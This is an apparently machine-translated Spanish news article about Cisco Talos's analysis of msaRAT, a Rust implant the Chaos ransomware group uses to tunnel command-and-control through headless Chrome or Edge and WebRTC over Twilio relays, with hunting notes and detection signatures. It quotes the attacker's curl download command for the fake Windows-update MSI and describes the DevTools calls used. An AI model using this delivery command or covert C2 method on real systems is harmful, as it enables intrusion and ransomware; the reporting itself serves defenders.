Chaos Ransomware utiliza msaRAT para enrutar el tráfico C2 a través de Chrome y Edge sin cabeza – CYBERDEFENSA.MX
El grupo de ransomware Chaos ejecutó su comando y control a través del propio navegador de la víctima. Cisco Talos el jueves msaRAT detalladoel implante Rust detrás de él, encontrado en una máquina Windows comprometida delante del cifrador.
El implante nunca abre una conexión saliente propia. Su proceso habla con 127.0.0.1 y nada más. Inicia Chrome o Edge en modo sin cabeza y dirige el navegador a través del protocolo Chrome DevTools, la API de depuración propia del navegador.
Cada mensaje C2 viaja desde allí a través de un canal de datos WebRTC transmitido por el servicio TURN de Twilio, por lo que lo que un defensor ve en el cable es un navegador que llama a Cloudflare y Twilio. La dirección del servidor del atacante nunca aparece.
Chrome habla
msaRAT busca primero Chrome o Edge a través de variables de entorno y luego recurre al registro de Chrome. Si no se encuentra ningún navegador coincidente, se omite la ruta CDP.
Cuando encuentra uno, inicia el navegador sin una ventana visible usando --headless=newhabilita CDP con --remote-debugging-porty lo apunta a un punto separado --user-data-dir.
Desde Cromo 136Google ya no respeta el interruptor de depuración del perfil predeterminado, un cambio anunciado en marzo de 2025 después de que los ladrones de información tomaran la bandera por robo de cookies. msaRAT trae su propio directorio de perfiles, por lo que el cambio no se interpone en su camino. Nada en el análisis de Talos muestra que toque en absoluto el perfil de la víctima.
El malware pregunta /json/list/ para un destino depurable y se conecta a la URL de WebSocket devuelta. Crea una pestaña, desactiva la Política de seguridad de contenido con Page.setBypassCSPregistra cinco devoluciones de llamada a través Runtime.addBindingy llamadas Runtime.evaluate para inyectar JavaScript almacenado en texto sin formato en el binario .rdata sección.
Cuatro nombres de devolución de llamada, msaOpen, msaClose, msaErrory msaMessagele dio a Talos el nombre del malware. El quinto es dataAck.
Ese JavaScript obtiene la configuración STUN y TURN de un trabajador de Cloudflare en is-01-ast[.]ols-img-12[.]workers[.]devcon encabezados Origin y Referer disfrazados de tráfico del sitio de Microsoft. Crea una conexión entre pares y publica una oferta SDP en el mismo punto final.
La respuesta regresa sin candidatos ICE y la dirección de conexión establecida en 0.0.0.0por lo que no se puede formar ningún enlace directo de igual a igual, y todo el canal pasa por el relé de Twilio en global.turn.twilio.com. Una vez que el canal de datos está activo, el Trabajador se sale del camino.
El tráfico en ese canal se cifra dos veces. El navegador maneja DTLS y en su interior se encuentra un esquema basado en ChaCha-Poly1305 codificado por un intercambio ECDH que comienza con 0xFE marco de apretón de manos desde el C2 inmediatamente después de la conexión.
El implante pasa los marcos de comando entrantes a cmd.exe /e:ON /v:OFF /d /c para su ejecución. Talos considera que la cola de envío y el control de flujo probablemente estén diseñados para mover grandes cargas útiles, como capturas de pantalla o archivos, de manera confiable.
Ni la mitad del transporte es nueva. Pretoriano mostrado en agosto de 2025. que la infraestructura TURN de las plataformas de conferencias podría transportar un canal C2 completo, y Sansec encontró un skimmer en marzo de 2026 utilizar canales de datos WebRTC para pasar los datos de tarjetas robadas más allá de la inspección HTTP.
msaRAT coloca ambos dentro de un implante Rust vinculado al Caos que impulsa un navegador sin cabeza a través de CDP.
El camino de entrada es el mismo de siempre
msaRAT llega después de que el operador ya haya ejecutado y antes de que se ejecute el cifrador. Talos no dice cómo se llegó a esta máquina. el grupo libro de jugadas documentado Se trata de inundaciones de spam, vishing, Quick Assist y herramientas RMM para la persistencia.
El implante en sí baja con un único comando de flexión:
curl.exe https://172.86.126[.]18:443/update_ms.msi -o C:\programdata\update_ms.msi
Puerto 443, HTTP simple. Las reglas de firewall escritas alrededor de números de puerto sin inspección de protocolo lo dejan pasar. El MSI transporta datos de propiedad que se hacen pasar por una actualización de Windows y se activa una acción personalizada al final de la instalación para cargar una DLL integrada directamente en la memoria.
Esa DLL es msaRAT: escrita en Rust en el tiempo de ejecución asíncrono de Tokio, exportando una función llamada RUN para que el instalador llame.
Notas de caza
msaRAT es un malware posterior al compromiso y no depende de una vulnerabilidad de Chrome o Edge, por lo que los defensores no tienen ningún parche de navegador que aplicar para la técnica en sí.
La señal que perdura es el comportamiento del proceso. Como dice Talos, «se considera que todas las comunicaciones externas se originan en un proceso de navegación legítimo». Busque Chrome o Edge iniciado por un instalador, un servicio u otro padre no interactivo con --headless=new y --remote-debugging-port colocar.
Luego correlacione ese proceso con el tráfico de bucle invertido al puerto de depuración y al WebRTC saliente. Donde la telemetría captura mensajes CDP, Runtime.addBinding y Runtime.evaluate son los pivotes. Las flotas que ejecutan automatización de navegadores o CI tendrán sus propios trabajos sin cabeza para ajustar.
Hasta el 23 de julio de 2026, Talos no ha publicado ningún hash de archivos para msaRAT. El conjunto de indicadores públicos son dos artefactos de red, la IP provisional y el nombre de host del trabajador, ambos en su repositorio del COI. Cobertura de detección de Talos:
- almeja AV:
Win.Downloader.ChaosRaas-10060321-0 - Bufido 2:
1:66839,1:66840,1:66841 - Bufido 3:
1:66839,1:301587
Esos indicadores son útiles pero limitados. workers.dev es Dominio de implementación compartido de Cloudflareemitido para todas las cuentas de Workers, y los atacantes lo utilizaron el año pasado para organizar cargas útiles y túnel C2.
Twilio ejecuta un servicio STUN y TURN legítimo del que dependen las aplicaciones WebRTC reales. Bloquee cualquiera de los dos a nivel de organización e interrumpirá el tráfico de trabajo para todos los que los utilicen. Talos lo lee como la razón probable por la que se eligió a Cloudflare Workers para la señalización.
Trate esto como una artesanía observada en lugar de una campaña mesurada. El informe no identifica a la víctima, no establece cuántas organizaciones recibieron msaRAT, no dice cuándo comenzó a utilizarse el malware ni explica cómo se obtuvieron las credenciales de Cloudflare Worker y Twilio TURN.
La entrega no tiene nada de especial: una descarga curl, una actualización falsa de Windows, una DLL cargada desde un MSI. Lo que cambia es dónde vive el C2 después, y ambos indicadores publicados por Talos se pueden cambiar mañana. Un navegador sin cabeza generado por un instalador es más difícil de mover porque es la técnica.
msaRAT busca dos navegadores y necesita que uno de ellos esté presente y autorizado. En una flota de Windows, ese no es un requisito exigente.















